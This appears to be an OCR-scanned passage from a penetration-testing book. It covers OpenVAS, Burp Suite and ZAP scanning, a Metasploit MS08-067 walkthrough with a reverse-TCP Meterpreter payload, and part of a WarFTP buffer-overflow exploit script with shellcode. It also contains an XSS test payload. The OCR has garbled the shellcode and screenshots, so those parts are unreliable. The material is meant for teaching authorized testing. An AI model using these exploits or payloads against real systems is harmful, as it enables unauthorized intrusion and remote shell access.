different configurations, do authenticated scans, create reports, and even distribute scans over 
multiple nodes. 


To get OpenVAS up and running, from a command prompt on your Kali host, type: 
ө openvas-setup 


e openvas-scapdata-sync 
e openvas-certdata-sync 
e openvas-adduser 

e gsd 


Enter the server address as localhost and the username/password of the account you created during 
the setup phase. 


Log in 
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OpenVAS 


Once you login, you can go right to starting a scan: 
e Tasks -> New 


e Click on the Blue Star on Scan Targets 
e Add your IP ranges and Create the Scan 


Greenbone Security Desktop 





























vabilities Scan Tasks 
Tasks 
ü Д 
Мате Status Reports First 
Name demo | 
Comment (optional) | 
Scan Config empty e| | a | 
Scan Targets | demo je] 
Escalator (optional) |-- $|!@ 
Schedule (optional) | -- JI 8 
Slave (optional) — |-- $|!@ 
| Cancel | Create 


Open VAS Settings 


It is pretty straightforward to start and kick off a vulnerability scan as your tasks should be pre- 
populated at the bottom pane of Greenbone Security Desktop. Once you see your task, you can right- 
click on that task and click “Start.” 


Greenbone Security Desktop 


File Task View Settings Extras Help 
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Logged in as: root at 127.0. 
OpenVAS - Starting Scan 








Once the scan completes, you can go over to the report tab or export the report to a PDF format. 











Greenbone Security Desktop 


Fle Task View Settings Extras 
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OpenVAS — Results 


This vsftpd vulnerability was the one that we found on the Metasploitable 2 box, which we used to 
exploit with Metasploit in the prior section. 


report-c1827d74-e9fd-46f5-ab3b-40f12b791ee7.pdf 
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OpenVAS — Findings 


Vulnerability scanning is still an important factor in any penetration test, though it definitely 1s not the 
be-all and end-all for offensive testing. If you look at real world examples, other than external 
scanning, most attacks do not incorporate a lot of internal scans. This is because they are loud, trigger 
intrusion detection systems, and, at times, take down services. Instead, they focus on moving quietly 
through the network, taking knowledge gained from each step to move laterally, and the importance of 
data exfiltration. 


Web Application Scanning 


Scanning the SUCK network, we should now have a good idea of what the infrastructure and running 
services look like. We have done our research on OSINT tools, created password lists, and we have 
run our vulnerability scanner. So what's next? Since most companies these days actually do run 
vulnerability scanners across their networks, although I still do come across ms08-067, but it is 
becoming much less frequent. If you do come across an infrastructure that does patch generally well, 
then web application scanning on a network pentest can be extremely helpful. 


After I start the network scanners and get a layout with the active discovery tools, I begin my web 
application scanners. In web scanning, I am going to mainly focus on one tool. There are a lot of good 
open source/free tools available to use, such as ZAP, WebScarab, Nikto, w3af, etc. In this case, I am 
going for the quickest, most efficient way to perform a test. Although the Burp Suite Pro 
(http://portswigger.net/burp/) is a commercial tool, it only costs around $300. This is well worth the 
cost as it is actively maintained, has a lot of capabilities for manual testing, and many security 
researchers develop extensions for Burp. 


Similar to the discussion of vulnerability scanners, this isn't going to be a comprehensive guide to 
accomplishing web application penetration tests, but more of what is performed during a network 
penetration test. If you want to focus on testing a single application thoroughly, you are going to want 
to look into both source code analysis (using something like HP Fortify) and in-depth application 


testing (a great resource for this is a book called The Web Application Hacker's Handbook: Finding 
and Exploiting Security Flaws). Let's dive into how to efficiently use Burp Suite. 


The Process For Web Scanning 


In this section, I describe how I use Burp Suite Pro to scan web applications during a network 
penetration test. Usually, I won't have enough time during a network pen-test to do a full web 
application test, but these are the steps I take when I identify larger applications: 

e Spider/Discovery/Scanning with Burp Pro 

e Scanning with a web application scanner 

e Manual parameter injection 

e Session token analysis 


Web Application Scanning 


After running a tool like Nessus or Nexpose to find the common system/application/service 
vulnerabilities, it is time to dig into the application. I am going describe how to use Burp Suite and 
get you to start looking deeper into the application. The following steps will: 

1) Configure Your Network Proxy 

2) Enable Burp Suite 

3) Spider through the application 

4) Discover Content 

5) Runthe Active Scanner 

6) Exploit 


Configuring Your Network Proxy and Browser 
Remember that the Burp Suite tool works by configuring your web browser to talk through the Burp 


Suite application and then to the web application(s). This will give you full visibility in the requests 
made by the browser and also give you the ability to modify the raw requests regardless of client side 
protections. 


First, you are going to want to start Burp Suite by running the JAR file on either the Windows or Kali 
system. Once you have Burp up and running, you want to make sure your proxy is enabled and 
listening on port 8080. Go to the Proxy tab in Burp, then to Options, and make sure that Burp is 
running. It doesn't matter which interface port you use, however, if you change it from the default, 
make sure to change it in your browser's configuration. 


i ЧЕ ми hao a 


[?) Proxy Listeners 
(а) Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one 
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Add | Running | interface invisible — | Redirect 
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Each installation of Burp generates its own CA certificate that Prony listeners can use when negotiating 55L connections. You can impo 
tools or another installation of Burp. 




















Use these settings to control which requests are stalled for viewing and editing in the intercept tab. 
W intercept requests based on the following rules: 
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d oi reg. 
Enabling Burp Suite 


Now, we need to configure your browser so that it can use the port on which we had Burp Proxy 
listening. The add-on that I use 1s called Foxy Proxy for Firefox: 
(https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/) 


And it should have been installed in the setup phase. It provides an easy way to have multiple proxies 
and be able to change between them quickly. Right next to the browser's URL bar, there is a fox with 
a circle and line across it. Click on the fox, click Add New Proxy, click the Proxy Details tab, and set 


the Manual Proxy Configuration to the local host (127.0.0.1) and the proxy port of 8080. Go back to 
the General tab, give that proxy a name, and save that configuration. 


What you have essentially done is told your browser to send all the traffic to your local host to port 
8080. This is the port on which we have configured the Burp Suite application to listen. Burp knows 
that it will take this traffic and proxy it out to the Internet. 


* 4 View Source * {lj Options 
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\_ Direct internet connection (no proxy) 


(*) Manual Proxy configuration 
Helpi Where are settings for HTTP, 55L, FTP, Gopher, and SOCKS? 


Hoster IP Address 127.0.0.1 





Configuring the Browser's Proxy Settings 


Since you have saved this profile, right-click on the fox and drop down to select your proxy 
configuration. In this case, I named my proxy configuration Burp Suite and selected that as my proxy. 


Use proxy "Default" for all URLs 


Completely disable FoxyProxy 


Options 
QuickAdd 
Use Advanced Menus 





Selecting the Proxy to Utilize 


Once we have our browser using the proxy, we can browse to the web application we identified 
earlier. In this example, I am going to go to my site in my browser: www.securepla.net. If we go back 
to Burp, we are going to see the Proxy/Intercept tab light up. 


Burp Intruder Repeater Window Help 
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Burp Capture and Intercepting Traffic 


If we see this happen, we know we have configured everything perfectly. We see that Burp 
successfully captured the GET request for my website and we can also see any cookies and other 
requested information. By default, the initial state is to intercept all traffic. Intercept means to stop 
any requests from the browser to the web application, give you the ability to read or modify that 
request, and either forward that request to the web application or drop that request. 


If you try to browse to any sites with the default setting, you won't be able to see any responses until 
you turn off the "Intercept" button. By turning the "Intercept" button off, we will still be capturing all 
the web traffic, but we won't be directly tampering with every request. Once in an “Intercept-off’ 
state, you can see all the requests and responses within the History tab to the right of the Intercept. 


Now, if we go to the Target tab, we can see the URL that we had just trapped and forwarded. Let's 
first add this site to our Scope. Scope defines where automated spidering and testing could occur and 
helps prevent you from actively scanning domains that are out of your scope. We will go into this a 
little bit later, but you should add all the URLs or FQDNs you want to test to your scope. The image 
below shows the tester right-clicking on the domain and clicking on "Add to scope." 


Burp intruder Repeater Window Help 
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Creating Your Scope 


Spider Application 
The first thing to do for web application testing is to spider the host. This means that Burp will crawl 


through the whole website and record all the different files, forms, and HTTP methods on that site. 
We spider first because we need to identify where all the links are, what types of parameters are used 
in the application, what external sites the application references to, and the overall layout of how the 
application functions. 


To spider your application, drop into the Target tab, the Site map tab, right-click the domain on which 
you want to spider, and click "Spider this host." 
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Spidering the Host 


Once the spidering process is complete, Burp should have a good layout of what the application looks 
like. We can also click on any file (image below) to see what the request and the response were. In 
the left-hand column, we see all of the files and folders, and on the right-hand side, we see the 
requests and responses. Right below the Site map tab is the Filter button. Try playing around with this 
to see what you are filtering out and what works for you. Generally, I like to first add all my domains 
to scope and then click the Filter to only show those that are in scope. It ends up cleaning up a lot of 
referenced domains, which are out of scope on my tests anyway. 
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Server: Apache 
Last-Modified: Sun, 27 Nov 2011 23:00:37 GMT 
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Site Map/Request and Responses 





Discover Content 

There are times where pages or folders are not directly linked from a web application. For example, I 
have often seen that the admin folder or login page are not referenced anywhere on the site. You might 
see that when you go to the /admin/ folder in your browser bar, you are taken to the admin 
authentication page, but this might have been missed during the spidering phase. This is usually 
because host administrators are trying to hide these folders and administrative login pages from 
general users. These are the exact types of things you are looking for in a test, so that you can try to 
bypass or brute-force the authentication process. 


There is a specific module within Burp that is extremely helpful in these scenarios. Within the same 
Site map tab, you right-click on the parent URL, drop down to "Engagement tools," and click on 
"Discover content." 
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Discover Content 


Once inside the Discovery module, you can click on the "Session is not running" button and the 
application will start "smart brute forcing" folders and file structures. When I say, "smart brute 
forcing," I mean the application learns from files and folders it finds within the application and tries 
to make better choices for brute forcing. This technique provides an efficient process to identify 
folders and files to further your application testing. 


Before I show the example, note that there are custom wordlists that I prefer to use during my own 
assessments. One of these lists comes from a tool called RAFT that is no longer developed. 


These lists can be found here: http://code.google.com/p/raft/source/browse/trunk/data/wordlists/? 
r=64 





eoo Content discovery: htt 


[ Control [ config Site map | 


(2) Discovery Session Status 





Use these settings to monitor and control the discovery session. 


Session is running | 
Requests made 38 
Bytes transferred: 249,402 
Errors 0 
Tasks queued 170 
Spider requests queued: 0 


Responses queued for analysis: 0 





Queued Tasks 

Path | Task 

/wp-includes/js/ Test observed file names with custom ex 
/wp-includes/js/ Test observed directory names 
/wp-includes/js/jquery/ Test observed file names with custom ex 
/wp-includes/js/jquery/ Test observed directory names 

/feed/ Test observed file names with custom ex 
/feed/ Test observed directory names 

/search/ Test observed file names with custom ex 
/search/ Test observed directory names 

/cookie/ Test observed file names with custom ex 
iconkie / Test observed directory names 





Discovering Session Status 


As you can see in the image above, the Discovery tool identified the /wp-includes/ folder which is 
common to WordPress applications. It then starts looking for common folder/files types within that 
folder. You can click on the Site map tab at the top of the Discovery module and see all the results 
from that scan. This will help to quickly identify hidden folders, admin pages, configuration pages, 
and other pages that will prove useful to a tester. 


Running the Active Scanner 
Once you feel comfortable that you have identified an adequate portion of the site, you can start 


attacking the parameters, requests, and start looking for vulnerabilities. This can be done by right- 
clicking on the parent domain and dropping down to "Actively scan this host" (image below). This 
will kick off Burp's application scanner and start fuzzing input parameters. Remember, this is going to 
be extremely loud on the network and may submit extensive queries in the application. A quick 
warning, if the application has a comment box, the customer might receive an excessive amount of 
emails from all the parameters being actively fuzzed. This is why it is always important to let your 
customer know when and from where the tester will be performing these tasks. 


| Filter: Hiding out of scope and not found items; hiding CSS, image and gen 






















» $ / http: / /www.securepla.net/ 
» [3 feed Remove from scope 
[3 robots.txt - z 
D rss.php Spider this host 
D rss_advisories.php Actively scan this host T | 
[3 search Passively scan this host J www 
v ВВ search Engagement tools > |//www| 
D 1; Compare site maps f www, 
v [3 services p p ^ fennid 
Ds Expand branch M | 
[^ services Fxnand requested items iL ,...... ] 








Active Vulnerability Scans 


Once the scanner is running, the results and testing queue will be located in the "Scanner" tab. You 
might want to look at the Options tab within the Scanner tab to further configure Burp Suite. One 
change that I generally make to decrease scan times is to increase the number of threads in the Active 
Scan Engine section. This will make a significant difference in the amount of time that is required, but 
be careful, as you might take down a small site if the thread count is too high. 


If we take a look at the results, we see that Burp Suite found an XSS vulnerability for this website. 
Burp told us exactly what the issue was, the request to repeat it, and the response. 

































































O _. 


rit secure шли [v Cross-ste rpg reece R] 
i/ 
+ | feed i Cross-domain Referer leakage 
| rss.php i Cross-domain script include [4] 
i rss_advisories.php i Email addresses disclosed [2] 
b | unies 1 Private IP addresses disclosed 
> ju 1 Robots.txt file 
Y j wp-content - | HTML does not specify charset [5] 
> | themes ь j Frameable response (potential Clckjacking) [4] 
* dos example | Content type incorrectly stated [2] 


at: Www, bite гы Г: 
1 


reel -Agent: Mezilla/5.0 (Macintosh; Intel Mac 08 X 10.8; rvidd.0) Gecko/2010010 
Firefox/24.0 

Accept: text/html ,appl ication/xhtmlexml,application/xml;qe0,9,"/*:qe0. 8 
| Accept-Landusge:; e&nsUb.seniget 


Scan Results 





Being a penetration tester, you need to verify that you do not have any false positives and identify the 
actual severity of the finding. Let's see if what Burp had found was actually valid. Clicking on one of 
the XSS vulnerabilities, we can see the exact GET parameter that was used. To replicate this issue, 
we would have to go and visit: 


Wwww.securepla.net/xss_example/example.php?alert=9228a<script>alert(1)</script>281717daa8d. 


Opening a browser and entering the URL, the following demonstrates that this is not a false positive, 
but a real vulnerability. If you aren't familiar with XSS attacks, I would spend some time playing with 
a vulnerable web application framework like WebGoat: 


https://www.owasp.org/index.php/Category: OWASP WebGoat Project. 





@ www.securepla.net/xss example/example.php?alert-9228a «scrir 








XSS Example 


Burp will do a lot more than just check for XSS vulnerabilities. It can identify CSRF issues, bad SSL 
certs, directory traversal vulnerabilities, SQL injections, command injections, and much more. To see 
more uses of Burp, go to the section in this book about The Throw - Web Application Pentesting. 


OWASP Zap Proxy 
(https://code.google.com/p/zaproxy/)(Kali Linux/Windows/OS X) 


The equivalent to Burp Pro Proxy on the open source side is called OWASP Zed Attack Proxy or 
ZAP. Although Burp is a commercial tool, ZAP has many of the same features. From proxying traffic, 
fuzzing requests, spidering and automated scanning, ZAP does it all. In Windows/OS X, you can just 
double-click on the OWASP ZAP executable and you can run it on Kali with owasp-zap. 


We are going to test against one of the vulnerable frameworks on OWASPBWA (which we installed 
in the setup phase of the book). In this case we will be testing against the owaspbricks application. 
Once you start up ZAP, you will be presented with the image below. The straightforward attack is to 
just put in the URL http://[IP of VM]/owaspbricks/ and hit Attack. ZAP will automatically run through 
the spidering and testing for web vulnerabilities. 


Sundadmede $| [ial |e) ue OS OOO y 9 > оҳшаш е 
Ium + БЕНИН “бтз MEL Хы ши 
к Фс 


Welcome to the OWASP Zed Attack Proxy (ZAP) 


ТАР is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. 


Please be aware that you should only attack applications that you have been specifically been given permis: 


To quickly test ап application, enter its URL bebow and press Апас, 


WAL to attack: hitp://172.16.151. 144 /awasphricks] 


Progress: Spidering the URL to discover the content 


For a more in depth test vou should explore your application using your browser or automated reqression 


=History “Search Ж Break Points — Pl Alens | Active Scan Pe Spider =] g Forced Browse — Furzer [Params | 
Sie 1721615L14480 i р H 100% Current Scans: 0 | ША Found 
‘Processed WRI | 
bg PLES ee ees} 

Bae i122, 165.111,14 epee index php 
арР Т 144 epee brick s himi 
ipi i172.156.151.144 pe ce а= pases. him! 
hg i172.186.151.144 ea ee ci | ile -uplead: gage Bes 
OWASP ZAP. | 





As you can see, everything is pretty straightforward. Once the scan is finished, click on the Alerts tab 
to see all the vulnerabilities that are identified. 


f Untitled Session - OWASP ТАР 
Sandardmode : Ulale] alg ie аса GEG у зев рока а o 
Fi Ses ] i4 Scripts F Quick Start = Request s TTE A Break 24 Script Conta 


T @ ашн Header: Text: — обу: Tet 2] НӘ B 
k 0 Phmour72.16.151.144 
WTTP/1.1 280 (К 
Date: Tue, 18 Har 2815 1М1:4%:29% (ИТ 
Server: Apache/7,2,18 (Ubuntu aed mono/2,4,3 PHP/5,3,2-lubuntul,5 with Suhesin-H 
higl/3.8.1 nod npythan/3.3. 1 Pythen/2.8,.5 mad 31/2. 2.14 репа. 70. 0.5k Phusion P 
417 mod porlLé2.8.4 Perl/v5. 18.1 
X-Powered-By: PHP/5, 3. 2- ап .S 
Wary: Accept-Encoding 
Content-Length; 3178 
tn Tn an EAr ES ВИННЫЕ 3 — Ё Lx ы > ч 
ceri sci 8 ПЕР", Zndéz, php" >с] LPS of images ТАТА И pg eer 
«р> 
«веі» 
серет етаз lea) Legend» 
Error! ler does not cxistssbr/» 
off ieldzets 
рог 
«Бг гг 
сЕ г 











Ë Active бәп Ж Spider сг Forced Browse @ Fuzzer — [ ]Paramm ч Нир Sessions © Zest Results 


URL: http;/ /172.16.151.144  awaspbricks/ content - 2 / Index. php?u 


т B Ale (7 Risk; F High 
опасан чес 
- à Parameter user 
"m | tion = MySE]L (2 
= RE E bm Attack: — «div» «script»alermil); </script> «div» 
ь L3 P Application Error disclosure : ч : 
| й Evidence: </oive <script>alert(l): « [script <div> 
ь Бе Direcrory browsing (3) н % 
L al Passwnrd Autocomplete im browser (5 WARE id: | 
к 1 X-Content-Type-Optians header missing i54) Description 
* [i fa x-Frame-Options header not set (51) Crass-site Scripting (X55) is an attack technique that involves echalng ай 


сап be a standard web browser client, ar a browser object embedded in 
arnail Aliant Tha rade isl? ie талка writtan in HTA Гаі hut rm 





OWASP ZAP - Results 


Scanning with multiple web applications scanners is just as important as scanning with both Nessus 
and Nexpose for network-based vulnerabilities. Here is a side-by-side comparison of scanning the 
same application. As we can see, we have found completely different vulnerabilities, vulnerability 
locations, and different types of findings between ZAP on the left and Burp on the right. We can 
instantly identify that our scanners have much different results. 





Standard mode s ulti" " f 2 8 


Ve Scripts > Quick Start — "* Reque$ „ш. 14.151.144 
| Omaa 










Header: Теп $ Body. Tex 8 








togendOetaitsdi р Р 
@ Cross-site scripting (reflected 


hwe Cross- site scripting (reflected) 


Рима Confidence: Certain 
Most https /172.16.151.144 








n- /ndex php 


OWASP ZAP VS Burp 


иссез ЕЕ. 


Reflected cross-sine scripeing vulnerabübes arse м 


The one question that I often get is: Which is better?” The answer is that it always depends. The best 
answer would be to use both. They both do a lot of the same things, but have benefits in their specific 
areas. The security community does lean more on the Burp Proxy Pro because it supports Burp 
Extender (http://portswigger.net/burp/extender/), which you can use to create customized scan tools. 
You might have an application that does some processing of cookies or that requires a multi-step 
processes before fuzzing a certain parameter. This is where Burp has exceeded well and you can read 
more about this here: 


http://blog.opensecurityresearch.com/2014/03/extending-burp.html. 


Parsing Nessus, Nmap, Burp 


One of the biggest problems for any tester is that the outputs from many of the different tools can make 
them hard to use. Lee Baird has included a great parsing tool in his Discover toolset. It standardizes 
all the ports, services, findings, and associated information into an easily usable CSV format. 


ө cd /opt/discover 
e /discover.sh 
o 12. Parse XML 
o 2. Nessus (.nessus format) 


Мыл pe 


File Edit View Search Terminal Help 


Nessus 
Nmap 
Previous menu 


Choice: 2 





Discover Parsing 


The output saves to a csv file under /home/data. The image below shows both a Nessus and Nmap 
output. This makes it much easier to quickly identify systems, services, and vulnerabilities. 


T = À 4 LI с 
Lt = a i т т = T s is 1üfy 
а г i rm СР lad » й Р 3 I, ы u к. 








A Home Layout Tables | Charts SmartArt Formulas Data Review 
Font 
"ma |$) Fill ~ : Calibri (Body) "12 |+ А» Ат == = =з | Wrap Text = 
Paste fort {ЕЛЕ ИР. (Op A | = Мегде 
D | — Linux Kernel 2.6 on Ubuntu 8.04 (hardy) _ u 
ee аны UN |e е TUN meten F 
1 |CVSS Score IP FQDN 05 Port Vulnerability 
2 | 10 192 168.1.11 METASPLOIT Linux Kernel 8180 Apache Tomcat Manager Common Administrative C 
3 | 4.3 192.168.1.11 METASPLOIT Linux Kernel 80 Apache HTTP Server HttpOnly Cookie Information 0 
4 | 7.8 192.168.1.11 METASPLOIT Linux Kernel 80 Apache HTTP Server Byte Range DoS 
5 | 7.5 192.168.1.11 METASPLOIT Linux Kernel 80 Apache PHP-CGI Remote Code Execution 
6 | 8.3 192.168.1.11 METASPLOIT Linux Kernel 80 PHP PHP-CGI Query String Parameter Injection Arbi 
7 | 7.5 192.168.1.11 METASPLOIT Linux Kernel 80 phpMyAdmin Setup Script Configuration Parameter 
8^ 4.3 192.168.1.11 METASPLOIT Linux Kernel 80 phpMyAdmin error.php BBcode Tag X55 (PMASA-2( 
8 5 192.168.1.11 METASPLOIT Linux Kernel 80 phpMyAdmin file path Parameter Vulnerabilities (F 
eoe 4 nmap.csv 
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Cl +18 © (* 05 
EU 1р Address FQDN Protocol 
2 /192.168.1.65 uverse NODE WIFI :36:6d:aa Motorola VIP1232 digital set top box or 8080 tcp 
3 | 192.168.1.65 uverse_NODE_WIFI_:36:6d:aa Motorola VIP1232 digital set top box or 8086 tcp 
4 | 192.168.1.68 uverse NODE ETH 00:21:80: Motorola VIP1200-series or Swisscom E 8080 tcp 
5 |192.168.1.68 uverse NODE ETH 00:21:80: Motorola VIP1200-series or Swisscom E 8086 tcp 
6 | 192.168.1.68 uverse_DVR_ETH_20:e5:64:fb:89:41 Motorola VIP1232 digital set top box or 8080 tcp 
7 /192.168.1.65 uverse DVR .ETH, 20:65:64:fb:89:41 Motorola VIP1232 digital set top box or B086 tcp 
8 | |192.168.1.7C Ci sco AP ATT Linux 2.4.18 - 2.4.35 (likely embedded) 80 tcp 
g 192, 168.1.7C Cisco. АР АТТ Linux 2.4.18 - 2.4.35 (likely embedded) 443 tcp 
10 192. 168.1.7C Cisco. АР АТТ Linux 2.4.18 - 2.4.35 (likely embedded) 50003 tcp 
11 | |192.168.1.72 uverse NODE WIFI a4:a2:4a: Motorola VIP1232 digital set top box or B080 tcp 
12. |192. 168.1.72 uverse_NODE_WIFI_a4:a2:4a: Motorola VIP1232 digital set top box of B086 tcp 
ES 1192 ТАЯ 1 74 &nmniiter? Міга е лт 7 SPA- SPT Wind 135 trn 


Discover Results 


Burp takes a couple more steps. On the Scanner/Results Tab, right-click on the URL you scanned and 
click “Report Selected Issues.” You will be prompted with a reporting wizard and select XML and 
deselect Base64-encoded requests/responses. 





( Results | Scan queue | Live scanning | Options | 


| € [> @ SQL injection [3] 


> @ owaspbricks (| @Cross-site scripting (reflected) [3] 
> @ Cleartext submission of password [6] 


> ! Serialized object in HTTP message [10] 
> e Password field with autocomplete enabled 
| > i Crocs одын Referer акаде [2] 


ihm P$ Files АЯ Еол л ми 








eoo Burp nein — wizi 
(2) Choose the format for the report. 


O HTML 


(9 XML 
LJ Base64-encode requests and responses 


Discover Burp Logs 


And the output is a well-formatted CSV file with all your findings! This can make it quick for 
reporting, and quickly identifies what you are going to attack next. 


e. Path Vulnerability Description 
| Jowaspbricks/config/indm.phg Framnable response (potential Clickjacking} It might be possible for a web page 
Мрз Горка config) Frameable response (potential Clickjackng) It might bé possible for à web pug 
 hitp.//172.16.151,14 /owaspbricks/images/ Directory listing Directory listings do not necessarily 
hitg.//172.16.151.144 fewasgbrickilagin-1'index php Frameable responde uL Clickjackóny It might be possible for a web " 
http.//172.16.151.144 Jowaspbricks/styleshweeti/ | cong 
|h9://172:16.151.144 fowasgbrickistylesheetu/ Directory listing Directory listings do nat аселай 
hitp//172.16.151.144 — fowaspbricksy/login-3/ Password feid with autocomplete enabled Mast browsers have a facility to n 
) hapiri LiH fowaspbricks/lagin-pages.html Frameable response [patential ClickJacking) It might be possible for à web pag 
O hitp//172.16.151.144 — — fewaspbrkks/upload-l/ndexphp —— Path-relative style sheet import Path-nelative style sheet Import vu 
| ‘hittp,//172.16.151.144 Jowaspbricks/images/ Frameable response [patential ClickJacking) It might be possible for a web page 
httg.//172.16.151144 {бкр Frameable response (potential Clickjacking) af 
‘httpy//172.16.151.144 fowaspbricks/content-1/'index php Frameable response (potential Click|acicing) It might be possible for a web pag 


Discover Burp CSV 
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Summary 


Scanning the network is an important step for a successful network-wide penetration test. With such a 
large scope, both passive and active scanning can provide information about the network, services, 


applications, vulnerabilities, and hosts. Using specialized or customized port scans, web scraping, 
"smart brute forcing," and automated tools can help you increase the efficiency and the effectiveness 
of the test. These findings will directly lead into the next few sections on exploiting vulnerabilities 
identified by this process. 


The Drive - Exploiting Scanner Findings 


You were able to successfully complete your last mission of OSINT and scanning without being 
caught. The next phase of your mission is to take everything that you have gathered and learned to 
identify weaknesses and exploit them for fun and profit. 


As with the first THP book, The Drive section takes results from the prior phases and exploits them 
for an initial foothold into the company. Some findings might have exploits available through the 
Metasploit framework, some you might have to find on exploit forums, and some just take experience 
and knowledge to take advantage of misconfigurations. 


Using you use Nexpose or Nessus (or any other vulnerability scanner), might not make a difference 
for the exploiting process. Once a scanner finds a vulnerability, I will usually go and search for a 
working exploit. I have dedicated a section in the later chapters about Vulnerability Searching and 
how to find exploits based on findings from a scanner, but for now, I will briefly describe how to use 
Metasploit, the importance of understanding scripts to exploit your vulnerabilities, and common 
vulnerability misconfigurations. 


Metasploit 
(http://www .metasploit.com) (Windows/Kali Linux) 


Before we can get into exploiting scanner findings, we need to quickly go over Metasploit again. The 
Metasploit Framework 1s designed for developing, exploiting, and assisting in attacks. The best part 
of the framework is that it was developed with research in mind. By this, I mean that it is very easy to 
develop your own Metasploit modules and utilize them within the framework. It doesn't take a lot of 
Ruby knowledge, but it requires only basic scripting skills. Without spending too much time 
explaining Metasploit, let's walk through an example using the framework. Remember that this book 
is geared to those that have some Metasploit experience. If you are pretty new to Metasploit, you 
should spend a fair chunk of time learning the basics of this tool. 


Here are a few helpful tips before we start with Metasploit. You should refer back to these tips while 
you are using Metasploit during your first few times; after that you should be good on your own. 


From A Terminal In Kali - Initialize And Start Metasploit: 


e Start PostgreSQL 
© service postgresql start 
e Start PostegreSQL on Bootup 
o update-rc.d postgresql enable 


e Start and stop the Metasploit service (this will setup your database.yml file for you) 
© service metasploit start 
o msfconsole 
o exit 
o service metasploit stop 
e Log everything to /root/msf console.log at a command prompt: 
o echo "spool /root/msf console.log" > /root/.msfA/msfconsole.rc 
e Start Metasploit Command Line 
o Msfconsole 


Running Metasploit - Common Configuration Commands: 


e help: Use help as much as you can! 

e search [string]: Search for vulnerability by CVE, title, application, etc. 

e use [module]: select module 

e info: get information once a module is selected 

e show options: show the requirements for the module 

e set and setg: Set the variables from show options. You can use setg for Global 
Variables. If you are jumping between modules and exploits and you don't want to 
type in the IP address (or other input) every time, use setg instead of set 

e If you are using a remote exploit, you might not see the PAYLOAD as a choice 
inside show options, but you can always set it with: set PAYLOAD [hit tab a couple 
times to see the choices] 

e To set custom payloads: set EXE::Custom [file] 

e exploit -j: active module to the background any connections to the listening handler 


Running Metasploit - Post Exploitation And Other 


e sessions -K: Kill all sessions 

e background: From a Meterpreter shell, go back into the main menu, but keep your 
current session established in the background 

e Resource file scripts to automate your handler (more info at the tips and tricks 
section of the book): msfconsole -r resource.rc 

e http://www.cheatography.com/huntereight/cheat-sheets/metasploit-4-5-0-dev- 
1357137 


e http://www .offensive-security.com/metasploit-unleashed/Msfconsole Commands 





The best method is to learn through example. I know that the MS08-067 vulnerability is pretty old, but 
I still find these vulnerabilities every so often and the attack is extremely stable compared to other 
remote attacks. For those who have never used or exploited the MS08-067 vulnerability, I 
recommend setting up a lab with an old unpatched Windows XP system and trying this exact example. 


If you are an expert MS08-067'er, you can skip this short section. 


Using Metasploit For MS08-067: 


ө Dropping into Metasploit on Кай: 
© Open up a terminal and type: msfconsole 
e To search for a vulnerability, type: 
o search ms08-067 
e Select the exploit from the search results, type: 
o use exploit/windows/smb/ms08 067 netapi 
e See options required for the exploit to work, type: 
o show options 
e Set IP information, type: 
o set RHOST [IP of vulnerable Windows host] 
o set LHOST [IP of your machine] 
e Select which payloads (to get a better understanding of the types of payloads 
review: http://www.offensive-security.conYmetasploit-unleashed/Payload Types) 
and encoder to use, type: 
o set PAYLOAD windows/meterpreter/reverse tcp 
o set ENCODER x$86/shikata ga nai 
e Run the attack, type: 
o exploit 





Metasploit 


These are the basics of Metasploit and we will build off these really quickly. Make sure you spend 
time exploiting Windows and Linux machines before trying any attacks in the wild. 


Scripts 


There were countless times where I found exploits for vulnerabilities that were not in Metasploit. 
Usually, when searching for vulnerabilities based on version numbers from the banner-grabbing 
script, I will find exploits in other places (see Special Teams - Cracking Exploits and Tricks 
section). A lot of the time, the scripts/codes will be written in Python, C++, Ruby, Perl, Bash, or 
some other type of scripting language. 


Note that as a penetration tester, you need to be familiar with how to edit, modify, execute, and 
understand the scripts/codes regardless of the language and be able to understand why an exploit 
works. I don't recommend you ever execute a script without testing it first. I have honestly seen a few 
scripts on forums and Exploit-DB where the shellcode payload actually causes harm to the intended 
system. After the script exploits the vulnerability, the payload deletes everything on the vulnerable 
host. I am pretty sure that your client would not be too happy if everything on his host system was 
wiped clean. This is why you should always either use your own shellcode or validate the shellcode 
that is within the script. 


WarFTP Example 


Let's say you find a vulnerable version of WarFTP server running and you find some code (for 
example: http://downloads.securityfocus.conyvulnerabilities/exploits/22944.py) on the Internet. 
Things you may need to understand: 
e How do you run the exploit? What language is it? Do you need to compile it or are 
there any libraries you need to import? 
e Are there any dependencies required for the exploit to work? Version of Windows 
or Linux? DEP or ASLR? 
e Are the EIP addresses or any other registers or padding values hardcoded to 
specific versions? Do they need to be modified? 
e Will the exploit take down the service? Do you only have one chance at 
compromising the host? This is very important as you might need to work with the 
client or test a similar infrastructure environment. 


Here is an example of what your script could look like and, if run properly, could allow shell access 
on the victim server. 


| #'/usr/bin/ python? 


import оз 

import sys 

import struct 

sys.stdout = os.fdopen(sys.stdout.fileno(), 'v', 0) 


eip = Oxfa8ct3el 

shelleode = "\xeb\x03\%59)\xeb\ x05) хеВ\ ХЇБ\ wit) eft) eff) x49) 491 449) 49V 491 y 
shellcode += "ix49|x49|x491 x 49 X481 x491 x49 x49 X491 X49 «49 x 481 X51) X58 X 68 
Shellcode += "ix58ix30|x42| x31 x50 x 421 Mal) X65 x421 X411 4521 X321 X42 R42) X 421 
shellcode += "ix411x41 x20 1 x411 x41Y x 501 x30 x 421 x42 x 50 x75 x 4a x 49 x ob) x 4c 
shellcode += "ix5aix5aix4bi x32! x6dVx6dV 438 x48 x79 x 4b x 42 «4b x AT x Ab x AY 
shellcode "x71 x62 хла} x45 x51) 450) x51) 449) «61V 3301 455) x46) x3 1 x 4b х4ї\ 
shellcode += "ix50| x61 Vx 78 x6e\ x4dV x 6b x69) x74) x45) 258) x48 x61) x43 x 4b x 41 
Shellcode += "\x56\x33\x5a\x4b\ x 4f x69) x62 1x 661x571 x39 x62 x 68 x70) x 4C x dbi 
shellcode "i x37  x6bAx4c i x6dix53Xx621 x34 x 721 x54) x 491 x621 x 78 x56 x30 х52\ 
shellcode "AXx6£ x T8 x70) x65) x 38V x 781 x50) x 621 x Tal x 7 x74) x51) xf x 665 x33Y 
shellcode += "ix4fix4eix36| x 79A x 6Z Vx 68V x70) x42" 


prepend = "ix8lixCAAxFFAXEFAXFFAXFE" Й add esp, -1001h 
prepend += "\ x44" # inc esp 


buf = "USER " 
buf += "А" + 485  struct.pack('«I', eip) + "\x90" # 4+ prepend + shelleode 
